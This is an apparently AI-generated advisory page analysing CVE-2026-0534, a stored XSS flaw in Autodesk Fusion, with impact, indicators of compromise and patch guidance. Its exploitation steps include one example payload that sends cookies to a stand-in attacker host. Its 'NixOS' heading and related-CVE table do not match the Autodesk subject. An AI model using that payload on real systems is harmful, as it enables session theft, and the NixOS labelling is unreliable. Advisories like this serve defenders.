CVE-2026-0534
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-0534 is a Stored Cross-Site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A maliciously crafted HTML payload stored in a part's attribute can be triggered when a user clicks on it, potentially allowing an attacker to read local files or execute arbitrary code within the application's process context. The vulnerability affects all Autodesk Fusion versions prior to 2606.1.21 and was publicly disclosed on January 22, 2026. It carries a CVSS v3.1 base score of 8.1 (High), as assigned by Autodesk (Autodesk Advisory, NVD).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the stored variant. An attacker embeds a malicious HTML payload within a part's attribute in Autodesk Fusion; when another user opens or interacts with that part and clicks the attribute, the payload executes within the desktop application's rendering context. Because Autodesk Fusion is a desktop application (not a traditional browser), XSS in this context can have elevated consequences beyond typical web-based XSS, including local file system access and arbitrary code execution with the privileges of the running process. No public proof-of-concept code has been identified at this time (Autodesk Advisory, NVD).

Impact

Successful exploitation allows a malicious actor to read local files accessible to the Fusion application process or execute arbitrary code with the privileges of the current user running Fusion. This could lead to sensitive data exfiltration (e.g., design files, credentials, or other local documents), unauthorized system commands, or further lateral movement within the victim's environment. Availability is not directly impacted, but the high confidentiality and integrity impacts make this a significant risk for organizations using Autodesk Fusion in collaborative or multi-user environments (Autodesk Advisory, NVD).

Exploitability

No public proof-of-concept exploit or evidence of in-the-wild exploitation has been reported as of the time of this report. The EPSS score is approximately 0.022%, indicating a low current probability of exploitation. The vulnerability requires user interaction — specifically, a user must click on the malicious part attribute — which somewhat limits opportunistic exploitation. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. A patch has been made available by Autodesk (Autodesk Advisory, NVD).

Exploitation steps

  1. Craft malicious payload: An attacker creates a malicious HTML/JavaScript payload (e.g., <script>fetch('http://attacker.com/?data='+encodeURIComponent(document.cookie))</script> or a payload designed to read local files via Fusion's rendering engine).
  2. Embed in part attribute: The attacker stores the crafted HTML payload within a part's attribute field in an Autodesk Fusion project file or shared part.
  3. Distribute the malicious part: The attacker shares the malicious Fusion part with the target user via collaboration features, file sharing, or by uploading it to a shared workspace.
  4. Trigger execution: The victim opens the Fusion project and clicks on the malicious part attribute, triggering the stored XSS payload within the desktop application's process context.
  5. Achieve objective: The payload executes with the privileges of the Fusion application, enabling the attacker to read local files, exfiltrate data to a remote server, or execute arbitrary commands on the victim's system (Autodesk Advisory, NVD).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS connections from the Autodesk Fusion process (Fusion360.exe or equivalent) to unknown or suspicious external IP addresses or domains, particularly shortly after a user interacts with a part attribute.
  • File System: Unexpected file reads or copies of sensitive local files (e.g., documents, credentials stores) initiated by the Fusion process; new or modified files in Fusion's working directories with unusual names or extensions.
  • Logs: Application or system logs showing unusual child process spawning from the Fusion application process; network proxy logs capturing outbound requests from Fusion to non-Autodesk domains.
  • Process: Unusual child processes (e.g., cmd.exe, powershell.exe, bash) spawned by the Autodesk Fusion process; unexpected script interpreter activity associated with the Fusion user session.

Mitigation and workarounds

Autodesk has released a patched version of Fusion; users should update to version 2606.1.21 or later to remediate this vulnerability. Until patching is complete, organizations should exercise caution when opening Fusion parts received from untrusted or unverified sources, and avoid clicking on part attributes from unknown origins. Restricting collaborative access to Fusion projects to trusted users only can reduce exposure. Updated installers are available via the official Autodesk download links for both Windows and macOS (Autodesk Advisory).

Community reactions

The vulnerability was noted in CISA's weekly vulnerability bulletin for the week of January 19, 2026, indicating it received standard government tracking attention. Red Hat's security advisory database also indexed the CVE, reflecting routine cross-vendor vulnerability tracking. No significant independent researcher commentary, social media discussion, or major media coverage has been identified beyond standard vulnerability aggregator entries (CISA Bulletin, Red Hat CVE).

Additional resources


SourceThis report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86738CRITICAL9.3
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026
CVE-2026-86734HIGH7.1
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026
CVE-2026-86735MEDIUM5.9
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026
CVE-2026-86737MEDIUM5.3
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026
CVE-2026-86736MEDIUM5.3
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management